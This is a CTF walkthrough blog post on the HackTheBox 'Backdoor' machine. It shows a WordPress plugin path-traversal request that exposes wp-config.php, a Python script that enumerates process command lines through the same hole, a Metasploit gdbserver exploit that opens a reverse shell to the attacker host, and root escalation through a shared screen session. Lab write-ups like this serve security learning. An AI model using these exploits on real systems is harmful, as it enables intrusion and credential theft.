<!doctype html><html lang=en dir=auto><head><meta charset=utf-8><meta http-equiv=x-ua-compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name=robots content="index, follow"><title>HackTheBox: "Backdoor" Walkthrough | Micha's Attic</title><meta name=keywords content="hackthebox,ctf"><meta name=description content="Introduction The now retired Backdoor machine on HackTheBox is supposed to be an &ldquo;easy&rdquo; machine, so it should be absolutely straight-forward. Let&rsquo;s see!
Foothold On this machine, I started with a directory scan, using the fuzz-Bo0oM.txt list, which usually yields good results - at least on HackTheBox. We&rsquo;ll notice that directory listing is enabled almost everywhere, so we can also explore manually.
In the end, we&rsquo;ll find a pretty standard WordPress installation with a single plugin called &ldquo;ebook-download&rdquo; enabled - for which we will find a LFI vuln pretty quick:"><meta name=author content="Micha"><link rel=canonical href=https://blog.micha.gg/2022/04/24/hackthebox-backdoor-walkthrough/><link crossorigin=anonymous href=/assets/css/stylesheet.min.79a4c9cb65f7123f4c4abeceb6301a04f3860036c1b9bf5fe9749f7df83ac0cf.css integrity="sha256-eaTJy2X3Ej9MSr7OtjAaBPOGADbBub9f6XSfffg6wM8=" rel="preload stylesheet" as=style><script defer crossorigin=anonymous src=/assets/js/highlight.min.2840b7fccd34145847db71a290569594bdbdb00047097f75d6495d162f5d7dff.js integrity="sha256-KEC3/M00FFhH23GikFaVlL29sABHCX911kldFi9dff8=" onload=hljs.initHighlightingOnLoad()></script>
<link rel=icon href=https://blog.micha.gg/favicon.ico><link rel=icon type=image/png sizes=16x16 href=https://blog.micha.gg/favicon-16x16.png><link rel=icon type=image/png sizes=32x32 href=https://blog.micha.gg/favicon-32x32.png><link rel=apple-touch-icon href=https://blog.micha.gg/apple-touch-icon.png><link rel=mask-icon href=https://blog.micha.gg/safari-pinned-tab.svg><meta name=theme-color content="#2e2e33"><meta name=msapplication-TileColor content="#2e2e33"><meta name=generator content="Hugo 0.97.3"><noscript><style>#theme-toggle,.top-link{display:none}</style><style>@media(prefers-color-scheme:dark){:root{--theme:rgb(29, 30, 32);--entry:rgb(46, 46, 51);--primary:rgb(218, 218, 219);--secondary:rgb(155, 156, 157);--tertiary:rgb(65, 66, 68);--content:rgb(196, 196, 197);--hljs-bg:rgb(46, 46, 51);--code-bg:rgb(55, 56, 62);--border:rgb(51, 51, 51)}.list{background:var(--theme)}.list:not(.dark)::-webkit-scrollbar-track{background:0 0}.list:not(.dark)::-webkit-scrollbar-thumb{border-color:var(--theme)}}</style></noscript><meta property="og:title" content="HackTheBox: &#34;Backdoor&#34; Walkthrough"><meta property="og:description" content="Introduction The now retired Backdoor machine on HackTheBox is supposed to be an &ldquo;easy&rdquo; machine, so it should be absolutely straight-forward. Let&rsquo;s see!
Foothold On this machine, I started with a directory scan, using the fuzz-Bo0oM.txt list, which usually yields good results - at least on HackTheBox. We&rsquo;ll notice that directory listing is enabled almost everywhere, so we can also explore manually.
In the end, we&rsquo;ll find a pretty standard WordPress installation with a single plugin called &ldquo;ebook-download&rdquo; enabled - for which we will find a LFI vuln pretty quick:"><meta property="og:type" content="article"><meta property="og:url" content="https://blog.micha.gg/2022/04/24/hackthebox-backdoor-walkthrough/"><meta property="article:section" content="posts"><meta property="article:published_time" content="2022-04-24T19:56:04+02:00"><meta property="article:modified_time" content="2022-04-24T19:56:04+02:00"><meta property="og:site_name" content="Micha's Attic"><meta name=twitter:card content="summary"><meta name=twitter:title content="HackTheBox: &#34;Backdoor&#34; Walkthrough"><meta name=twitter:description content="Introduction The now retired Backdoor machine on HackTheBox is supposed to be an &ldquo;easy&rdquo; machine, so it should be absolutely straight-forward. Let&rsquo;s see!
Foothold On this machine, I started with a directory scan, using the fuzz-Bo0oM.txt list, which usually yields good results - at least on HackTheBox. We&rsquo;ll notice that directory listing is enabled almost everywhere, so we can also explore manually.
In the end, we&rsquo;ll find a pretty standard WordPress installation with a single plugin called &ldquo;ebook-download&rdquo; enabled - for which we will find a LFI vuln pretty quick:"><script type=application/ld+json>{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Posts","item":"https://blog.micha.gg/posts/"},{"@type":"ListItem","position":2,"name":"HackTheBox: \"Backdoor\" Walkthrough","item":"https://blog.micha.gg/2022/04/24/hackthebox-backdoor-walkthrough/"}]}</script><script type=application/ld+json>{"@context":"https://schema.org","@type":"BlogPosting","headline":"HackTheBox: \"Backdoor\" Walkthrough","name":"HackTheBox: \u0022Backdoor\u0022 Walkthrough","description":"Introduction The now retired Backdoor machine on HackTheBox is supposed to be an \u0026ldquo;easy\u0026rdquo; machine, so it should be absolutely straight-forward. Let\u0026rsquo;s see!\nFoothold On this machine, I started with a directory scan, using the fuzz-Bo0oM.txt list, which usually yields good results - at least on HackTheBox. We\u0026rsquo;ll notice that directory listing is enabled almost everywhere, so we can also explore manually.\nIn the end, we\u0026rsquo;ll find a pretty standard WordPress installation with a single plugin called \u0026ldquo;ebook-download\u0026rdquo; enabled - for which we will find a LFI vuln pretty quick:","keywords":["hackthebox","ctf"],"articleBody":"Introduction The now retired Backdoor machine on HackTheBox is supposed to be an “easy” machine, so it should be absolutely straight-forward. Let’s see!\nFoothold On this machine, I started with a directory scan, using the fuzz-Bo0oM.txt list, which usually yields good results - at least on HackTheBox. We’ll notice that directory listing is enabled almost everywhere, so we can also explore manually.\nIn the end, we’ll find a pretty standard WordPress installation with a single plugin called “ebook-download” enabled - for which we will find a LFI vuln pretty quick:\n.../filedownload.php?ebookdownloadurl=../../../wp-config.php Neat - we can download the WordPress configuration, containing credentials for the database. But it seems we can’t do anything with the credentials for the database server.\nLet’s continue with a port scan:\n22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 b4🇩🇪43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA) | 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA) |_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Backdoor \u0026#8211; Real-Life |_http-generator: WordPress 5.8.1 1337/tcp open waste? Of course, 1337/tcp stands out. But what kind of service is running there? We can try a few simple things: Try to open it in a browser, try to SSH and as last resort, try telnet. Sadly, none of that works.\nNow, the next step took me a while: Using Linux, we can read /proc//cmdline to get information about a running process, so we might be able to find the process which has opened port 1337. We only need to know the PID - which we don’t. So let’s use the LFI we found earlier to scan a range of PIDs.\nTo be honest, this script could have been a lot easier - but somehow I got the idea “I want to scan faster - I need multiple connections”, so I ended up with this. Maybe I’m able to use it again in the future 😉\n(Disclaimer: I’m not an async Python expert, so forgive me (or maybe even tell me) if there is a bad mistake.)\nimport asyncio import aiohttp from aiohttp import ClientSession, ClientConnectorError  # https://stackoverflow.com/a/61478547 async def gather_with_concurrency(n, *tasks):  semaphore = asyncio.Semaphore(n)   async def sem_task(task):  async with semaphore:  return await task  return await asyncio.gather(*(sem_task(task) for task in tasks))  async def fetch_html(url: str, session: ClientSession, **kwargs) - tuple:  try:  resp = await session.request(method=\"GET\", url=url, **kwargs)  except ClientConnectorError:  return (url, 404, \"\")  return (url, resp.status, await resp.text())  async def make_requests(urls: set, **kwargs) - None:  async with ClientSession() as session:  tasks = []  for url in urls:  tasks.append(  fetch_html(url=url, session=session, **kwargs)  )  results = await gather_with_concurrency(10, *tasks)   for result in results:  print(f'{str(result[2])}')  if __name__ == \"__main__\":  urls = [(  f\"http://10.10.11.125/wp-content/plugins/ebook-download/\"  f\"filedownload.php?ebookdownloadurl=/proc/{i}/cmdline\"  ) for i in range(10000)]   asyncio.run(make_requests(urls=urls)) This scan yields (with some garbage removed in the beginning and end, due to the way the download script works):\nsuuser-ccd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true; bash-ccd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true; gdbserver--once0.0.0.0:1337/bin/true Finally! On port 1337 there seems to be a gdbserver running. That seems pretty unusual but why not - let’s see what we can do with this.\nUser After some research, we find the exploit/multi/gdb/gdb_server_exec payload in metasploit. I used the following configuration, where everything should be pretty self-explanatory, except for set target 1: 0 is x86, 1 is x86_64. Using the wrong architecture, running the exploit will fail with the message:\n The payload architecture is incorrect: the payload is x86, but x64 was detected from gdb.\n msf6  use exploit/multi/gdb/gdb_server_exec [*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp msf6 exploit(multi/gdb/gdb_server_exec)  set LHOST 10.10.14.5 LHOST = 10.10.14.5 msf6 exploit(multi/gdb/gdb_server_exec)  set LPORT 4444 LPORT = 4444 msf6 exploit(multi/gdb/gdb_server_exec)  set RHOSTS 10.10.11.125 RHOSTS = 10.10.11.125 msf6 exploit(multi/gdb/gdb_server_exec)  set RPORT 1337 RPORT = 1337 msf6 exploit(multi/gdb/gdb_server_exec)  set target 1 target = 1 msf6 exploit(multi/gdb/gdb_server_exec)  set payload payload/linux/x64/shell/reverse_tcp payload = linux/x64/shell/reverse_tcp msf6 exploit(multi/gdb/gdb_server_exec)  run  [*] Started reverse TCP handler on 10.10.14.5:4444 [*] 10.10.11.125:1337 - Performing handshake with gdbserver... [*] 10.10.11.125:1337 - Stepping program to find PC... [*] 10.10.11.125:1337 - Writing payload at 00007ffff7fd0103... [*] 10.10.11.125:1337 - Executing the payload... [*] Sending stage (38 bytes) to 10.10.11.125 [*] Command shell session 2 opened (10.10.14.5:4444 - 10.10.11.125:54214 ) at 2022-04-24 15:15:56 -0400  id uid=1000(user) gid=1000(user) groups=1000(user) Done! 👍\nRoot For privilege escalation, I’m going to ask LinPEAS for an idea. Under the section “Unix Sockets Listening” there is an unusual entry: /run/screen/S-root/964.root.\nSo there seems to be a screen session running. We cannot directly access this socket file:\ndrwx------ 2 root root 60 Apr 24 18:13 S-root But as this is an “easy” machine, there are no false trails - so it’s highly likely that we must do something with the screen command.\nAs I had literally no idea what do to, I Googled “access root screen session as user” (or something similar - didn’t write down the exact search term 😉), which lead to this post. The interesting part being:\nscreen -x host_username/session_name We know the username is root and the session name is also root, so let’s try\nscreen -x root/root … and we will find ourselves in a screen session with a root shell!\nNB: Using a non-upgraded reverse shell, this command fails with the message:\n Must be connected to a terminal.\n Conclusion and Learnings Although this is an “easy” machine, I struggled a bit after finding the LFI. Enumerating the processes using /proc was something I didn’t think off right away. I spent way too much time on the Python script, but also learned a bit while writing it. Also, I learned that just because a socket is not readable does not mean I can’t do anything with it. Finally, I learned about screen multi-user mode.\nAll in all: I had some fun with this machine, despite the setup not looking very realistic (except for the LFI).\n","wordCount":"958","inLanguage":"en","datePublished":"2022-04-24T19:56:04+02:00","dateModified":"2022-04-24T19:56:04+02:00","author":{"@type":"Person","name":"Micha"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://blog.micha.gg/2022/04/24/hackthebox-backdoor-walkthrough/"},"publisher":{"@type":"Organization","name":"Micha's Attic","logo":{"@type":"ImageObject","url":"https://blog.micha.gg/favicon.ico"}}}</script></head><body id=top><script>localStorage.getItem("pref-theme")==="dark"?document.body.classList.add("dark"):localStorage.getItem("pref-theme")==="light"?document.body.classList.remove("dark"):window.matchMedia("(prefers-color-scheme: dark)").matches&&document.body.classList.add("dark")</script><header class=header><nav class=nav><div class=logo><a href=https://blog.micha.gg/ accesskey=h title="Micha's Attic (Alt + H)">Micha's Attic</a>
<span class=logo-switches><button id=theme-toggle accesskey=t title="(Alt + T)"><svg id="moon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 12.79A9 9 0 1111.21 3 7 7 0 0021 12.79z"/></svg><svg id="sun" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="5"/><line x1="12" y1="1" x2="12" y2="3"/><line x1="12" y1="21" x2="12" y2="23"/><line x1="4.22" y1="4.22" x2="5.64" y2="5.64"/><line x1="18.36" y1="18.36" x2="19.78" y2="19.78"/><line x1="1" y1="12" x2="3" y2="12"/><line x1="21" y1="12" x2="23" y2="12"/><line x1="4.22" y1="19.78" x2="5.64" y2="18.36"/><line x1="18.36" y1="5.64" x2="19.78" y2="4.22"/></svg></button></span></div><ul id=menu><li><a href=https://blog.micha.gg/tags/ title=Tags><span>Tags</span></a></li></ul></nav></header><main class=main><article class=post-single><header class=post-header><div class=breadcrumbs><a href=https://blog.micha.gg/>Home</a>&nbsp;»&nbsp;<a href=https://blog.micha.gg/posts/>Posts</a></div><h1 class=post-title>HackTheBox: "Backdoor" Walkthrough</h1><div class=post-meta><span title="2022-04-24 19:56:04 +0200 +0200">April 24, 2022</span>&nbsp;·&nbsp;5 min&nbsp;·&nbsp;Micha</div></header><div class=toc><details open><summary accesskey=c title="(Alt + C)"><span class=details>Table of Contents</span></summary><div class=inner><ul><li><a href=#introduction aria-label=Introduction>Introduction</a></li><li><a href=#foothold aria-label=Foothold>Foothold</a></li><li><a href=#user aria-label=User>User</a></li><li><a href=#root aria-label=Root>Root</a></li><li><a href=#conclusion-and-learnings aria-label="Conclusion and Learnings">Conclusion and Learnings</a></li></ul></div></details></div><div class=post-content><h1 id=introduction>Introduction<a hidden class=anchor aria-hidden=true href=#introduction>#</a></h1><p>The now retired <em>Backdoor</em> machine on HackTheBox is supposed to be an &ldquo;easy&rdquo; machine, so
it should be absolutely straight-forward. Let&rsquo;s see!</p><h1 id=foothold>Foothold<a hidden class=anchor aria-hidden=true href=#foothold>#</a></h1><p>On this machine, I started with a directory scan, using the <code>fuzz-Bo0oM.txt</code> list, which
usually yields good results - at least on HackTheBox. We&rsquo;ll notice that directory
listing is enabled almost everywhere, so we can also explore manually.</p><p>In the end, we&rsquo;ll find a pretty standard WordPress installation with a
single plugin called &ldquo;ebook-download&rdquo; enabled - for which we will find a LFI vuln pretty quick:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-plain data-lang=plain><span style=display:flex><span>.../filedownload.php?ebookdownloadurl=../../../wp-config.php
</span></span></code></pre></div><p>Neat - we can download the WordPress configuration, containing credentials for the database.
But it seems we can&rsquo;t do anything with the credentials for the database server.</p><p>Let&rsquo;s continue with a port scan:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-plain data-lang=plain><span style=display:flex><span>22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
</span></span><span style=display:flex><span>| ssh-hostkey:
</span></span><span style=display:flex><span>|   3072 b4🇩🇪43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
</span></span><span style=display:flex><span>|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
</span></span><span style=display:flex><span>|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
</span></span><span style=display:flex><span>80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
</span></span><span style=display:flex><span>|_http-server-header: Apache/2.4.41 (Ubuntu)
</span></span><span style=display:flex><span>|_http-title: Backdoor &amp;#8211; Real-Life
</span></span><span style=display:flex><span>|_http-generator: WordPress 5.8.1
</span></span><span style=display:flex><span>1337/tcp open  waste?
</span></span></code></pre></div><p>Of course, <code>1337/tcp</code> stands out. But what kind of service is running there?
We can try a few simple things: Try to open it in a browser, try to SSH and as last resort,
try telnet. Sadly, none of that works.</p><p>Now, the next step took me a while: Using Linux, we can read <code>/proc/&lt;pid>/cmdline</code>
to get information about a running process, so we might be able to find
the process which has opened port 1337. We only need to know the PID - which we don&rsquo;t.
So let&rsquo;s use the LFI we found earlier to scan a range of PIDs.</p><p>To be honest, this script could have been <em>a lot</em> easier - but somehow I got the idea
&ldquo;I want to scan faster - I need multiple connections&rdquo;, so I ended up with this.
Maybe I&rsquo;m able to use it again in the future 😉</p><p>(<em>Disclaimer: I&rsquo;m not an async Python expert, so forgive me (or maybe even tell me)
if there is a bad mistake.</em>)</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span><span style=color:#f92672>import</span> asyncio
</span></span><span style=display:flex><span><span style=color:#f92672>import</span> aiohttp
</span></span><span style=display:flex><span><span style=color:#f92672>from</span> aiohttp <span style=color:#f92672>import</span> ClientSession, ClientConnectorError
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#75715e># https://stackoverflow.com/a/61478547</span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>async</span> <span style=color:#66d9ef>def</span> <span style=color:#a6e22e>gather_with_concurrency</span>(n, <span style=color:#f92672>*</span>tasks):
</span></span><span style=display:flex><span>    semaphore <span style=color:#f92672>=</span> asyncio<span style=color:#f92672>.</span>Semaphore(n)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>async</span> <span style=color:#66d9ef>def</span> <span style=color:#a6e22e>sem_task</span>(task):
</span></span><span style=display:flex><span>        <span style=color:#66d9ef>async</span> <span style=color:#66d9ef>with</span> semaphore:
</span></span><span style=display:flex><span>            <span style=color:#66d9ef>return</span> <span style=color:#66d9ef>await</span> task
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>return</span> <span style=color:#66d9ef>await</span> asyncio<span style=color:#f92672>.</span>gather(<span style=color:#f92672>*</span>(sem_task(task) <span style=color:#66d9ef>for</span> task <span style=color:#f92672>in</span> tasks))
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>async</span> <span style=color:#66d9ef>def</span> <span style=color:#a6e22e>fetch_html</span>(url: str, session: ClientSession, <span style=color:#f92672>**</span>kwargs) <span style=color:#f92672>-&gt;</span> tuple:
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>try</span>:
</span></span><span style=display:flex><span>        resp <span style=color:#f92672>=</span> <span style=color:#66d9ef>await</span> session<span style=color:#f92672>.</span>request(method<span style=color:#f92672>=</span><span style=color:#e6db74>&#34;GET&#34;</span>, url<span style=color:#f92672>=</span>url, <span style=color:#f92672>**</span>kwargs)
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>except</span> ClientConnectorError:
</span></span><span style=display:flex><span>        <span style=color:#66d9ef>return</span> (url, <span style=color:#ae81ff>404</span>, <span style=color:#e6db74>&#34;&#34;</span>)
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>return</span> (url, resp<span style=color:#f92672>.</span>status, <span style=color:#66d9ef>await</span> resp<span style=color:#f92672>.</span>text())
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>async</span> <span style=color:#66d9ef>def</span> <span style=color:#a6e22e>make_requests</span>(urls: set, <span style=color:#f92672>**</span>kwargs) <span style=color:#f92672>-&gt;</span> <span style=color:#66d9ef>None</span>:
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>async</span> <span style=color:#66d9ef>with</span> ClientSession() <span style=color:#66d9ef>as</span> session:
</span></span><span style=display:flex><span>        tasks <span style=color:#f92672>=</span> []
</span></span><span style=display:flex><span>        <span style=color:#66d9ef>for</span> url <span style=color:#f92672>in</span> urls:
</span></span><span style=display:flex><span>            tasks<span style=color:#f92672>.</span>append(
</span></span><span style=display:flex><span>                fetch_html(url<span style=color:#f92672>=</span>url, session<span style=color:#f92672>=</span>session, <span style=color:#f92672>**</span>kwargs)
</span></span><span style=display:flex><span>            )
</span></span><span style=display:flex><span>        results <span style=color:#f92672>=</span> <span style=color:#66d9ef>await</span> gather_with_concurrency(<span style=color:#ae81ff>10</span>, <span style=color:#f92672>*</span>tasks)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>for</span> result <span style=color:#f92672>in</span> results:
</span></span><span style=display:flex><span>        print(<span style=color:#e6db74>f</span><span style=color:#e6db74>&#39;</span><span style=color:#e6db74>{</span>str(result[<span style=color:#ae81ff>2</span>])<span style=color:#e6db74>}</span><span style=color:#e6db74>&#39;</span>)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>if</span> __name__ <span style=color:#f92672>==</span> <span style=color:#e6db74>&#34;__main__&#34;</span>:
</span></span><span style=display:flex><span>    urls <span style=color:#f92672>=</span> [(
</span></span><span style=display:flex><span>            <span style=color:#e6db74>f</span><span style=color:#e6db74>&#34;http://10.10.11.125/wp-content/plugins/ebook-download/&#34;</span>
</span></span><span style=display:flex><span>            <span style=color:#e6db74>f</span><span style=color:#e6db74>&#34;filedownload.php?ebookdownloadurl=/proc/</span><span style=color:#e6db74>{</span>i<span style=color:#e6db74>}</span><span style=color:#e6db74>/cmdline&#34;</span>
</span></span><span style=display:flex><span>        ) <span style=color:#66d9ef>for</span> i <span style=color:#f92672>in</span> range(<span style=color:#ae81ff>10000</span>)]
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    asyncio<span style=color:#f92672>.</span>run(make_requests(urls<span style=color:#f92672>=</span>urls))
</span></span></code></pre></div><p>This scan yields (with some garbage removed in the beginning and end,
due to the way the download script works):</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-plain data-lang=plain><span style=display:flex><span>suuser-ccd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
</span></span><span style=display:flex><span>bash-ccd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
</span></span><span style=display:flex><span>gdbserver--once0.0.0.0:1337/bin/true
</span></span></code></pre></div><p>Finally! On port 1337 there seems to be a <code>gdbserver</code> running. That seems
pretty unusual but why not - let&rsquo;s see what we can do with this.</p><h1 id=user>User<a hidden class=anchor aria-hidden=true href=#user>#</a></h1><p>After some research, we find the <code>exploit/multi/gdb/gdb_server_exec</code> payload
in metasploit. I used the following configuration, where everything should be
pretty self-explanatory, except for <code>set target 1</code>: 0 is x86, 1 is x86_64.
Using the wrong architecture, running the exploit will fail with the message:</p><blockquote><p>The payload architecture is incorrect: the payload is x86, but x64 was detected from gdb.</p></blockquote><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-plain data-lang=plain><span style=display:flex><span>msf6 &gt; use exploit/multi/gdb/gdb_server_exec
</span></span><span style=display:flex><span>[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
</span></span><span style=display:flex><span>msf6 exploit(multi/gdb/gdb_server_exec) &gt; set LHOST 10.10.14.5
</span></span><span style=display:flex><span>LHOST =&gt; 10.10.14.5
</span></span><span style=display:flex><span>msf6 exploit(multi/gdb/gdb_server_exec) &gt; set LPORT 4444
</span></span><span style=display:flex><span>LPORT =&gt; 4444
</span></span><span style=display:flex><span>msf6 exploit(multi/gdb/gdb_server_exec) &gt; set RHOSTS 10.10.11.125
</span></span><span style=display:flex><span>RHOSTS =&gt; 10.10.11.125
</span></span><span style=display:flex><span>msf6 exploit(multi/gdb/gdb_server_exec) &gt; set RPORT 1337
</span></span><span style=display:flex><span>RPORT =&gt; 1337
</span></span><span style=display:flex><span>msf6 exploit(multi/gdb/gdb_server_exec) &gt; set target 1
</span></span><span style=display:flex><span>target =&gt; 1
</span></span><span style=display:flex><span>msf6 exploit(multi/gdb/gdb_server_exec) &gt; set payload payload/linux/x64/shell/reverse_tcp
</span></span><span style=display:flex><span>payload =&gt; linux/x64/shell/reverse_tcp
</span></span><span style=display:flex><span>msf6 exploit(multi/gdb/gdb_server_exec) &gt; run
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>[*] Started reverse TCP handler on 10.10.14.5:4444
</span></span><span style=display:flex><span>[*] 10.10.11.125:1337 - Performing handshake with gdbserver...
</span></span><span style=display:flex><span>[*] 10.10.11.125:1337 - Stepping program to find PC...
</span></span><span style=display:flex><span>[*] 10.10.11.125:1337 - Writing payload at 00007ffff7fd0103...
</span></span><span style=display:flex><span>[*] 10.10.11.125:1337 - Executing the payload...
</span></span><span style=display:flex><span>[*] Sending stage (38 bytes) to 10.10.11.125
</span></span><span style=display:flex><span>[*] Command shell session 2 opened (10.10.14.5:4444 -&gt; 10.10.11.125:54214 ) at 2022-04-24 15:15:56 -0400
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>id
</span></span><span style=display:flex><span>uid=1000(user) gid=1000(user) groups=1000(user)
</span></span></code></pre></div><p>Done! 👍</p><h1 id=root>Root<a hidden class=anchor aria-hidden=true href=#root>#</a></h1><p>For privilege escalation, I&rsquo;m going to ask LinPEAS for an idea. Under the section
&ldquo;Unix Sockets Listening&rdquo; there is an unusual entry: <code>/run/screen/S-root/964.root</code>.</p><p>So there seems to be a screen session running. We cannot directly access this socket file:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-plain data-lang=plain><span style=display:flex><span>drwx------  2 root root  60 Apr 24 18:13 S-root
</span></span></code></pre></div><p>But as this is an &ldquo;easy&rdquo; machine, there are no false trails - so it&rsquo;s highly likely
that we <em>must</em> do something with the <code>screen</code> command.</p><p>As I had literally no idea what do to, I Googled <em>&ldquo;access root screen session as user&rdquo;</em>
(or something similar - didn&rsquo;t write down the exact search term 😉), which
lead to <a href=https://unix.stackexchange.com/a/163878>this post</a>. The interesting part being:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-plain data-lang=plain><span style=display:flex><span>screen -x host_username/session_name
</span></span></code></pre></div><p>We know the username is <code>root</code> and the session name is also <code>root</code>, so let&rsquo;s try</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-plain data-lang=plain><span style=display:flex><span>screen -x root/root
</span></span></code></pre></div><p>&mldr; and we will find ourselves in a screen session with a root shell!</p><p>NB: Using a non-upgraded reverse shell, this command fails with the message:</p><blockquote><p>Must be connected to a terminal.</p></blockquote><h1 id=conclusion-and-learnings>Conclusion and Learnings<a hidden class=anchor aria-hidden=true href=#conclusion-and-learnings>#</a></h1><p>Although this is an &ldquo;easy&rdquo; machine, I struggled a bit after finding the LFI.
Enumerating the processes using <code>/proc</code> was something I didn&rsquo;t think off right away.
I spent way too much time on the Python script, but also learned a bit while writing it.
Also, I learned that just because a socket is not readable does not mean I can&rsquo;t do
anything with it. Finally, I learned about screen multi-user mode.</p><p>All in all:
I had some fun with this machine, despite the setup not looking very realistic
(except for the LFI).</p></div><footer class=post-footer><ul class=post-tags><li><a href=https://blog.micha.gg/tags/hackthebox/>hackthebox</a></li><li><a href=https://blog.micha.gg/tags/ctf/>ctf</a></li></ul></footer></article></main><footer class=footer><span>&copy; 2022 <a href=https://blog.micha.gg/>Micha's Attic</a></span>
<span>Powered by
<a href=https://gohugo.io/ rel="noopener noreferrer" target=_blank>Hugo</a> &
        <a href=https://git.io/hugopapermod rel=noopener target=_blank>PaperMod</a></span></footer><a href=#top aria-label="go to top" title="Go to Top (Alt + G)" class=top-link id=top-link accesskey=g><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 12 6" fill="currentcolor"><path d="M12 6H0l6-6z"/></svg></a><script>let menu=document.getElementById("menu");menu&&(menu.scrollLeft=localStorage.getItem("menu-scroll-position"),menu.onscroll=function(){localStorage.setItem("menu-scroll-position",menu.scrollLeft)}),document.querySelectorAll('a[href^="#"]').forEach(e=>{e.addEventListener("click",function(t){t.preventDefault();var e=this.getAttribute("href").substr(1);window.matchMedia("(prefers-reduced-motion: reduce)").matches?document.querySelector(`[id='${decodeURIComponent(e)}']`).scrollIntoView():document.querySelector(`[id='${decodeURIComponent(e)}']`).scrollIntoView({behavior:"smooth"}),e==="top"?history.replaceState(null,null," "):history.pushState(null,null,`#${e}`)})})</script><script>var mybutton=document.getElementById("top-link");window.onscroll=function(){document.body.scrollTop>800||document.documentElement.scrollTop>800?(mybutton.style.visibility="visible",mybutton.style.opacity="1"):(mybutton.style.visibility="hidden",mybutton.style.opacity="0")}</script><script>document.getElementById("theme-toggle").addEventListener("click",()=>{document.body.className.includes("dark")?(document.body.classList.remove("dark"),localStorage.setItem("pref-theme","light")):(document.body.classList.add("dark"),localStorage.setItem("pref-theme","dark"))})</script><script>document.querySelectorAll("pre > code").forEach(t=>{const n=t.parentNode.parentNode,e=document.createElement("button");e.classList.add("copy-code"),e.innerText="copy";function s(){e.innerText="copied!",setTimeout(()=>{e.innerText="copy"},2e3)}e.addEventListener("click",o=>{if("clipboard"in navigator){navigator.clipboard.writeText(t.textContent),s();return}const e=document.createRange();e.selectNodeContents(t);const n=window.getSelection();n.removeAllRanges(),n.addRange(e);try{document.execCommand("copy"),s()}catch(e){}n.removeRange(e)}),n.classList.contains("highlight")?n.appendChild(e):n.parentNode.firstChild==n||(t.parentNode.parentNode.parentNode.parentNode.parentNode.nodeName=="TABLE"?t.parentNode.parentNode.parentNode.parentNode.parentNode.appendChild(e):t.parentNode.appendChild(e))})</script></body></html>